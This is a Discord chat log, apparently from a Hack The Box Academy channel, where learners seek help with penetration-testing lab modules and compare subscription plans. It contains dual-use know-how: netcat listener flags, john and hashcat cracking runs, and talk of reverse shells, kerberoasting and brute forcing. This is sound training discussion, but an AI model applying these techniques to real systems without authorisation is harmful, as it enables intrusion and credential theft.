Once it timed out you were no longer in the shell for meterpreter
Not a huge deal, just a bit of a quality-of-life problem for stepping through the various Academy modules
A good question - I'm not sure how to check that.
dm?
Let me rain-check that. I have an IRL appointment to get to right now
Want to send text from terminal to other linux terminal.Suggest me the way?
copy paste?
lol
usually ctrl + shift + c, ctrl + shift + v
@high sentinel real chat i mean to say
then nc -nvlp listener_port , nc listener listener_ip listener_port
can you please describe this command
i am new to this world @high sentinel
what is it that you don't understand?
-nvlp
what exactly are you trying to do anyway?
-l = Listener
-n = No DNS Resolution
-v = Verbose
-p = Port
just want to send text to other ubuntu system without knowing the network ip
-n Do not perform domain name resolution. If a name cannot be resolved without DNS, an error will be reported.
-v Produce more verbose output.
-l Listen for an incoming connection rather than initiating a connection to a remote host. The destination and port to listen on can
be specified either as non-optional arguments, or with options -s and -p respectively. Cannot be used together with -x or -z.
Additionally, any timeouts specified with the -w option are ignored.
-p source_port
Specify the source port nc should use, subject to privilege restrictions and availability.
if only there was a man to tell you
xd good one 😉
sounds like sending a letter to someone without having his address
that's not possible
^
i know it's a bit tricky
then suggest me how can i check the details of system by using same network
others*
not sure what you mean then
is this related to htb academy? if so, ask more specifically? if not, i'd suggest you ask about that elsewhere
officially a man 😄
#1024429874246590575 start a thread there if it is not related to HTB academy;
like if i connected to network and want to know the other system ip that are connected to the same network
alias lager="man"
how would i read the man man then? 😄 lager lager? 😄
i basically found a vulnerability in this webapp, where I can go ahead and add a public page to registered users, what should I do next to gain file access?
Is this related to htb academy content?
if not then ask in #1024429874246590575 ; are you allowed to have access to these things - if not; have you reported the vulnerability to the webapp devs?
if you're trying to post a screenshot, you'll need to first verify your htb account in #bot-commands
Looks like a shell PHP, which curl gave you the code for
What is the PHP code you're trying to run? Cause all I'm seeing is just setting vars
But it's not actually doing the callout
and if youre seeing the vars like that then your php code is likely broken
^
Because generally that means if you navigate to that page you'll see that displayed on the page
yes that is correct
I am seeing the IP and port displayed on the page
but I am following the HTB walkthrough
Disregard
SLOW MOMENT
haha
smh
you are right
@fathom pendant @thorn urchin
Thank you
not really
the note is just there for an fyi
that latter part is a reminder for this specific exercise
its saying this method is flexible for even different systems but warning it wont work on the exercise due to extra restrictions that situationally you wont see in the real world.
anyone else having problems spinning up boxes for the modules?
hey im on linux fundamentals and im using my own vm running kali and im on a zsh terminal.. and i connected to the vpn connection file it gave me and a spawned a target ip.. i can scan with nmap and see mad ports open.. but when i try to ssh in i get nothing and eventually it ends the connection
yes
i cant connect
but i can scan
what is the question asking you to do?
ok the first question is asking me to id the machine hardware name
the second is to id the path to htb-student home dir
i got the first one answered by using uname -a
and i found the machine har name
mhm
but when i cd into home its my home not the targets
so
what if there was a way to Print the Working Directory
which gives you the FULL path
let me go over the linux funds course real quick to check what it wants more specifically
one moment
lol ok maybe im dumb dumb but what happened, i got the answer wrong
is it not /home
/ being the path
wait dont tell me
/ is the ROOT directory
/home is all the homes
thank you
you should be able to figure it out from there :)
Is there a problem with starting machines now at academy ?
think of /home as you being in the neighbourhood of all the users and can see who lives where
i was able to start a machine just now, some machines do take slightly longer to spawn depending on services it needs to start up
hmm cant seem to start machines at file inclusions skill assesment 😦
ok so i figured it out it would be /home/htb-student.. but now i know 100% im not on the targets server
so lol why is that
lol why this keep happening
lol i can see that ssh is open so why can't i connect
since you're doing ssh as sudo; it's asking for your password first, ssh is something you don't need to do as sudo
also
"htp-student" it's "htb-student"
which is also probably why
if you wish to continue with help my DMs are open, as I said I'm just gonna bust through these
dope thanks
ping me here if you dm because I have it set to not notify me if I get a dm request
also biggest of the tips: linux is case sensitive with its options
-l and -L are 2 different things
@fathom pendant i msged you
Hi, I'm on the windows module and the last section. I just did the first two steps. Now I'm doing step 3 but it's bugging me a bit. It tells me "Creating a user called jim; Uncheck: User must change password at logon" I'm doing it through "Family & others users" and i don't get any boxes where i can uncheck "User must change password at logon" so I'm kind of not sure if I'm doing the right thing or wrong thing. Cause I don't remember the module talking about creating accounts https://i.imgur.com/IERGruE.png. Anyone has any idea?
Does anyone know which option's better? It costs 400£ for 5000 cubes. Platinum subscription gives 1000 cubes (or does it?) a month for 53£. Obviously the later seems like a juicy deal, so am I missing something?
@ocean night staff, some help pls?
@fathom pendant
@safe adder When you buy a sub you get the boxes u bought the sub with + more every month
don't just ping random staff
haven't done the intro to windows stuff brother; don't ping random users
Alright
Wdym? I'm referring to the academy subscriptions, is that right? Not the htb platform subscriptions.
jumping to pinging staff before seeing if someone else is better able to redirect you or answer your question is pretty low survival instinct
yes, i think they were meaning the "cubes" you get not "boxes"
Yeah, when you buy a sub you pay an amount of money every month. It depends on what sub you choose, if u choose what I have is 18$ a month you get a sub + 200 cubes a month + unlimited spawn of pwn boxes
this; a lot of learning in these modules are found using our good pal Google and/or reading the manual of the command
And this is the academy I'm talking about
why is the provided cheat sheet for the file transfers module so bare? there are loads of information and commands to gain from the module
Thank you, I see. My current subscription covers free access to all up to certain tiers, such as tier 0 - 2. Beyond them needs "cubes". As you can see the Plat subscription deal seems a lot better, 1000 cubes for 53£ a month whereas 5000 cubes cost you 400£. I'm just making sure before I got hit with something different.
Staff currently online, can you confirm? @ocean night
<@&861185840277487616>
ouch
There should be more information about this on the site, i think they have a FAQ. What kind of sub do you have right now?
Don't ping random staff
I really don't think I used the cheatsheets much tbh I stuck to my notes
Currently, it's student plan.
But what do you think should be included, I'd submit in #858470491676737536 if you think it's something worth adding to the cheat sheet @dim wolf
Active Directory skill assessment #2: + 1 Crack this user's password hash and submit the cleartext password as your answer.
May I get a hint please? I attempted kerberoast as Admin on MS01 host.
Ah, i think the student plan only have access to a few tiers. But once u buy a higher sub u have access to all the others. Not 100% about this. But as i said, there is information about this on the site i found this helpful when i bought my sub
The silver annual didn't specify monthly cubes, rather access to all tiers up to II, whereas monthly Silver gives you 200+ cubes a month.
Silver annual = silver monthly, just pay annually instead of monthly
well they are totally different though
Some people are just annoying. They know nothing, just want to mouth off.
i added a bunch of stuff to the cheat sheet for my reference but i don't have enough self-confidence to submit a suggestion like that
Just do it, if anything you'll get feedback as to why it wasn't included
¯_(ツ)_/¯
and then they ping staff randomly
i will.. consider it.
Big question, why is anime a thing as a PP?
what??
Cultured thing!
what module is this about
The anime module
dont spam modules chat with off topic stuff
verify your account in #welcome and shitpost in general chat
staff released some modules that look really interesting but too bad i only have student sub rn
I tried that but couldnt find the key to verify my account on academy
The major difference between the two is; annual gives you the access to the modules and job role paths, the monthly does not
sucks to suck, dont spam
And annual includes a voucher for one of the job role paths
Lmao
the voucher expires after a year though so you can't just stack vouchers
But then you can buy it with the cubes which comes every month
@rustic sage you have the Silver monthly?
Not counting the refunds; the silver monthly plan you'd get enough to outright buy all of the CPTS path after 10 months
Yes i do
but you are not considering you are also getting back some of your cubes with tier 2 and others you get all back
Then I think, Plat is also going to be the same. If Silver gives 200 cubes, it's probably going to be the same.
While yes, it's also assuming you're going to take the exam within the year
That's why I said not counting, realistically it's probably around 4-5 months
true
Maybe 6
agree :))
I don't feel like doing all that math
But the point is flexibility
¯_(ツ)_/¯
It's more flexible to be able to go through the path without having to wait for more cubes or buy anyway
yes, especially if you are in hurry or sth
Yea
And considering the value of one of the cert vouchers (which are good for 2 attempts) ($210 + tax) that's already half the value
Funny guy
As the topic is still regarding the modules and academy, it's still on-topic
¯_(ツ)_/¯
discussing optimal ways to purchase modules is an on topic subject for modules channel
And the answer is it depends
Don't spam
I just did the Linux fundamentals lol realized I bought it but never did it
When I looked at subscriptions, it seemed cheaper to buy the cubes.
Silver annual costs £350; the exam would cost £150, so you're effectively paying £200 for the cubes. At that point, all the tier 0/1/2 modules added up to 1960 cubes (net), although I think HTB have added a few more since. So, that's roughly £200 for 2000 cubes.
By contrast, I could buy 2000 cubes for £160 if I bought them without a subscription.
Yes, and that's if your intent is solely to go down one path
With little to no deviation
works for me
The other thing I noticed about the cubes is that there's no bulk discount. So, the only reason to buy 1000 at a time rather than 10 purchases of 100 cubes is convenience.
I bought em in chunks as I cleared out modules. was easier than dropping the full load at once
you can do it better with platinum just wait a month and a day for 2000 cubes
It says free access to all modules up to tier 2. I actually think buying cubes itself is expensive. For example, 400£ for 5000 cubes. If I do platinum subscription, 53£ monthly for 1000 cubes/month.
That's for student
The platinum wasn't around when I got started; I haven't done the sums for that.
As well
it also depends how long you expect yourself to take
Currently the plat is 40% off. That's why I'm asking people who've bought it.
If you're on the student one, no reason to go past
But it just depends
If you want to do that it's on you
For the Silver Annual part, I'm a bit confused because it gives you direct access up to tier 2 modules but did not mention cubes so.
if it doesnt mention cubes you dont get cubes
It wouldn't give you cubes, but you can calculate the number of cubes you would need to achieve the same result.
And yes if you complete a module you get permanent access to it
So if you cancel after a year you can go back
I see. Another good thing about the platform is I've been seeing updates and new modules, which I'm impressed. Good to know they're really putting in the effort to put out more content. So for certain, more low tier modules will come out and so for that, maybe direct access to tiers would be better?
up to your personal preference tbh
if you're not interested in the app side of things (bug bounty path) then it may not be worth it. But doesn't hurt to be able to just choose whatever modules you want after completing your desired path
unless you're a college student, in which case the student sub gets you the most value until you've completed all available modules
The other benefit of subscriptions is CPE credits (presumably for ISC2?) but I can get those other ways.
still not sure what CPE credits are for
Student sub in my opinion is really worth it. 6£ monthly for tiers up to 2. Btw, what is the CPE credits?
I know that the "main" HTB can be used for CPE at ISC2 (so many points for each active box you get), and I assume that there's a similar thing for HTB academy, but I haven't seen any official details.
CPE credit submission is available to our subscribed members. Subscribed members can obtain credits by completing Hack The Box Academy modules, Tier I and above. In order to start tracking your activity and automatically get your credits, you just need to enable this option through your account settings.
Here is how CPE credits are allocated:
Fundamental modules: 2 CPE credits
Easy modules: 4 CPE credits
Medium modules: 6 CPE credits
Hard modules: 8 CPE credits
Insane modules: 10 CPE credits
although there haven't been any insane modules released yet
oh I see that you have also used the convenient help button
I've bought 1000 cubes (solo purchase) so far, and I've used about half of them. Based on this discussion, I think I'll go for Platinum for a month, since it's cheaper than buying the other 1000 directly.
don't tell anyone but i didn't actually use the help section
now i know it's there though
You see the 40% discount on platinum?
It says 36% for me. So, £53 rather than £80 (ex VAT).
How do you get the ISC2 member ID? What's that.
I'm putting this training through my limited company (VAT registered) so it won't cost me anything in the long term.
you have to have an active cert from an ISC2 compliant entity
Im having a hard time with the attacking sql service in the attacking services module, the credentials provided have no privilege and I cant seem to do anything
as most certifications do expire after a certain amount of time
What does the credits do?
Continuing education Credits are used in lieu of redoing the exam to have it extend
Thank you.
In my case, I've got the SSCP, so I need 20 CPE (on average) per year to keep it active. It hasn't been particularly useful, but if I can pick up the CPE from stuff I'd do anyway then I might as well keep it going.
when it comes time to renew your cert: if you have enough CPE; in a relevant field, they just say "alright you've proven you're staying on top of this" and tend to renew
tfw i thought I had sec+ from compTIA but I don't kekw
I suggest you, read the section again. It was pretty straight forward. Probably you skipped sth
do you mean sqsh?
Its not allowing me to authenticate I read the section not sure whats going wrong
mysql wont work with the credentials they provided
are you using parrot
people were discussing sqsh is broken in parrot
I use kali so dont have any idea
sqsh is indeed borked on parrot
I am using kali linux, I can access sqsh but not sure what to do here, I used help to see the commands
Okay so I should look up sqsh syntax?
probably
Hey, I'm doing Footprinting/IPMI module rn. I got admin pass hash. I put it into txt file and use provided hashcat command. Everything is working great (I hope so), but I'm wondering if everything is great with progress of unhashing (?). Could somebody look at my screenshot and tell me if I have to wait 5 days for results?
I'm using VMWare kali linux (hashcat isn't working on my Windows idk why)
hashcat crack speed depends on specs but you don't have to wait 5 days to crack the hash.
in my case i cracked it in about a second
im really struggling with this sqsh syntax, the section doesnt say anything about it
although it also depends on what wordlist/patterns you're using
^
i mean in general, outside this platform
To learn more about the badge itself and the development behind the scenes I would recommend watch...
something like this
anyway i see im in the wrong channel too sorry
can I message someone who knows about sqsh syntax
I remember how I did this one now; I ran it through johntheripper
I also came up with this idea, but in the meantime I noticed that there is rockyou.txt on the machine. I used it and within 2 minutes I had the answer ready. Thanks again for your help!
I just finished the Metasploit module on academy and at the end it reads “To get more practice with this tool, check out the HTB boxes tagged at the end of this module” but i can’t find what it’s talking about can anyone show me please?
thanks
On the main page of Hack the Box (www.hackthebox.com) you can register and find machines that you can solve. For retired machines you might need a subscription
what do I need to do after I decoded to the state ":"?
anyone complete
Skill Assessment - Broken Authentication?
hm... interesting
Have a question regarding "Password Attacks":"Protected Files" section, the question point to use the cracked password for the user Kira.... what cracked password? that phrasing is confusing, is that cracked password already provided, or am I to enumerate the box, and find a file/hash to crack and obtain the password that way?
nvm, I figured it out
hi all
is there a support channel on discord?
best way to contact support is through the website chat bubble
great then i can wait 3 days for them to reply and then have them close my ticket early lol
thanks
and now the chat button isn't loading
if it's not showing up; search an article and say "no that didn't help" or do you mean the green chat bubble; adblock stops it from popping up if you have that enabled
ya thats the one i dont have any block software but i'll try what u just said
hmm thats not working either all it gives is 3 emojis to give feedback
anyone here done enterprise networks?
ya i did that it doesnt do anything
any ideas why this john would end the session right after starting without actually cracking the hash?
john --format=PKZIP --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2023-01-27 04:22) 0g/s 7279Kp/s 7279Kc/s 7279KC/s !jonaluz28!..*7¡Vamos!
Session completed
actually i know why
john zip.hash --show
0 password hashes cracked, 1 left
looks like it's a format that john doesn't know how to decode
interesting, I mean I generated the hash with zip2john and it does load it as PKZIP
i had a similar thing happen with a different module
where it gave the *Vamos!
is it also possible the pass was salted as well?
I mean... it would be going way out of what the module is showing me to do
also
it could be the case that rockyou isn't the wordlist
did the module provide you a different wordlist?
check resources in upper right of module above table of contents
its finishing in 1ms, I dont think its even starting, rockyou is a big list, even if the password was not there, it should run for a while
true
ill use a different wordlist to see
try doing john without --format it can often determine which one
it can also falsely identify but that is also a possibility
same thing
└──╼ [★]$ john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2023-01-27 04:36) 0g/s 7469Kp/s 7469Kc/s 7469KC/s !jonaluz28!..*7¡Vamos!
Session completed
try remaking the hashfile
yep make sure there arent any extra lines or spaces or bad chars
ssh2john was broken, but that was a python issue, so I had to modify it to work, I wonder if something else is broken with this
yeah let me try remaking the hash
go into it with nano and check for the things i just said 🙂
nano < vim
perhaps 🙂
which i dont lol one of these days tho
nothing, different wordlist, new hash, no empty lines or weird characters... john is not liking it
will try fcrackzip I guess....
i don't think pkzip is accepted?
i think normal zip is
from the man page:
-format:NAME
Allows you to override the ciphertext format detection. Currently, valid format names are DES, BSDI, MD5, BF, AFS, LM. You can use this option when cracking or with '-test'. Note that John can't crack password files with different ciphertext formats at the same time.
try adding -test to see if it gives you a reason
I see, thanks, let me give that a try
anyone did squashed in htb ?
that's a box right?
if so you're better off asking in #boxes after verifying your htb account in #bot-commands
Hey! Can someone help me with Attacking Common Applications Assessment I? The last question regarding the flag... I was able to use the /cgi to view the directory and get to the flag... However, no command is allowing me to view the contents of the flag.
Any advice? thanks!
Hi gang,
Doing the CPTS path. Just did Footprinting\FTP\2nd task. Could someone explain why I'm able to connect to the FTP server, download the content (flag), but not list the content with 'ls' while being connected? It prompts me for creds
hey can anyone give me a hand im really stuck, i can not vpn in
can you elaborate?
Anybody who finished the web services and api module from cbbh? 😁
i sent you a dm
Please, would somebody be able to assist with the last question on the skill assessment in the LFI module? Things I have tried so far include:
- I have fuzzed for parameters using ffuf and saw that one working param is the page param
- I have tried fuzzing with the LFIjhadix.txt file in order to spot a path traversal I can use, but no success
- I have looked for CVEs concerning PHP v7 and nginx without success
- I have gone through the source code but no hint
I am guessing they put it like that to show you common ftp misconfigurations. Normally, you shouldnt be able to download anything. I am also guessing you enter as anonymous
My suggestion, do footprinting module before attacking common services
Yes did.
Was just a bit annoying cause I spent a fair amount of time to try to figure out why I couldn't list the objects in it.
Great learning experience though
boy oh boy i just went down some horrendous rabbit holes in the file inclusion skills assessment 
I need some help with "TLS Attacks" - Skills Assessment. I have found almost the whole flag, but for some weird reason some part of it is corrupted. Could someone check my approach?
I can provide details on what I did so far.
Hey guys. Anyone who wrote some notes bout passwords attacks skill assessments medium lab? Stuck a little
do you have a specific question?
Well I got that I need to dig in some user and crack its files password, tried to hydra to locate some details about the user but it seems that it doesn’t support password auth, only keyboard..
And ssh , 139 and 445 ports are opened
If you have managed to read the file that can be easily found, then you have a clue where to go
Well I’m stuck about the fact that I don’t have any detail about users for this lab
Or it’s based on the previous lab?
everything you need is in that file
Well you mean the resources?
nope, in smb
Solved, it was a minor mistake by me.
we all did
It was a fun one
Well I entered cry0l1t3 smb’s user
And I saw the log through its history at ssh and saw he used lasagne and got 2 hashes. I think they're less important than this smb’s
once you have the interesting file and you can read it, try log onto the target and enumerate further
there might be something hidden from plain sight
Well I’m telling ya bro, I got both zip and docx file passes, entered Jason, enumerated further and got that information about cry0l1t3, continued enumerating that smb
Footprinting doesn't really cover sqsh
no, you said "Well I got that I need to dig in some user and crack its files password,", so try now to enumerate the system
So I need to continue dig in for more information, instead of trying to get something from that smb’s user, cause I cannot perform any command there
again, once you have the file and can read it, use the contents
the service might not be visible to an outsider
but can be visible otherwise
It has enough info about mssql to do that part though
Well that documentation file informing me about creating inlane installation
Fair
it gives you enough information to assume what they could have been doing
Can you answer me dm?
I'm stuck in linux where they ask you to use the find command.
I've tried a lot of commands but the file just doesn't seem to appear
hello i want to know what is the root flag
Root flag is basically a .txt file that has a code in it, that you send as proof that you gained root access
it's found whenever u get root access basically
hack
gain access to root user/account
find root.txt
i know hacking and pentesting but i am new to hack the box. when i opened the starting machines i found questions and i answered them but what should i hack ???
sorry i just now got it
when i connect to the machine it becomes like a guest on my computer
you know hacking and pentesting, which means that you should already know the things
ya but i didn't know that the machine becomes a guest after i connect to it
it's a simple telnet connection
nothing stops you from researching
i did i found it by googling it
HI,
Since yesterday i'm on the skill assessment in the brute force module in service login section.
I have the word list made with username-anarchy which has 15 words. Is that right?
And I have the second list made with cupp, apparently this one is just made with the first name, number, special characters and leet? I have 1320 words.
I read that we need to put the surname too.
It's been several times that I run this brute force and I always end up losing the connection with the server and I can't solve this section ....
Thanks for help and tips 😉
Hey guys, I’m at passwords attacks skill assessments medium lab
I went through and now I’m at the part when I got inside the file that the ip I need to connect with is 10.129.200.21 with root and no password, but I’m struggling to get that smbclient connection
why do you think you need to connect 10.129.200.21?? what happens when you ping it?? think about it
Anyone have tips on how to get through Shells & Payloads - The Live Engagement? Can't even send a payload through to the foothold let alone connect to internal hosts because it is so slow.
Well nothing happens, I just need a lead and someone here advised me to try there
^
^
Well I saw the info about inlane in the document, I’ll enumerate in the ssh for files
Question on the Silver Annual plan, will this unlock the CREST module?
I've been hours cracking Kira credentials and i'm tired can someone help me out? Password attack modules
Did anyone do the noSQL injection module and could give me a hint at the last assessment?
Hello everyone! Since I was tired of not understanding some of the commands I was introducing, I decided to start the "introduction to bash scripting". To my surprise... I'm already stuck in the first script... anyone has done this module or knows bash scripting?!
Are you using MSFCONSOLE to upload the exploit?!
Yeah the handler
Let me DM you
Ngl until a little while ago when someone asked for help and said that's how they were doing it I had no idea there was a Metasploit module for that 😅
You mean for meterpreter? How did you do it before?
You can generate a payload with msfvenom and upload it manually. (You're talking bout the tomcat exploit right?)
Ok. I will try that. Thanks for your reply
Anyone?
Lost a little
Oh yeah trying to get to the Tomcat exploit part. Can't even establish a solid reverse shell with the foothold to tunnel because the system is so slow.
Would try to troubleshoot but I'm not home rn. Sorry
No problem! Did you already complete that section?
Yes
anyone able to get the Rpivot to launch the page on firefox. I have confirmed everything is set up right and can access the page with curl, but getting timed out attempting to directly access it.
Nice. It might just be my internet...
dm me if u want
did the issue resolve?
Nop 😦
When it's not the server being down, it's this:
[ERROR] 1 target was disabled because of too many errors
I think I have the right list of words, we should not block like that for brute force ...
There are 39 modules in the "CREST CPSA/CRT Preparation" skill path, spread across tiers 0, I, and II.
The silver annual subscription includes all modules in those 3 tiers, so you would be able to complete the skill path.
My advice is to start from the beginning. Go ahead and read things about info security. Have you finished the information security foundation skill path? If not, do that first
I did it, I was just off for a few weeks due to army stuff (I’m Lt)
I get that there is something about MySql
Gonna enumerate a little further
yes and the next step is pretty basic foundational stuff
The installation guide of NoSQLMap in the nosql injection module is outdated. Someone please help me.
Traceback (most recent call last):
File "nosqlmap.py", line 544, in <module>
main(args)
File "nosqlmap.py", line 45, in main
attack(args)
File "nosqlmap.py", line 163, in attack
nsmweb.postApps(victim,webPort,uri,https,verb,postData,requestHeaders, args)
File "/home/htb-ac687720/Desktop/NoSQLMap/nsmweb.py", line 465, in postApps
injIndex = int(args.injectedParameter)
TypeError: int() argument must be a string or a number, not 'NoneType'
I believe i tried installing NoSQLmap as well
but yes, it's outdated
I suggest using alternatives
whats an alternative
im stuck at the last assessment i tried every payload manually with no success
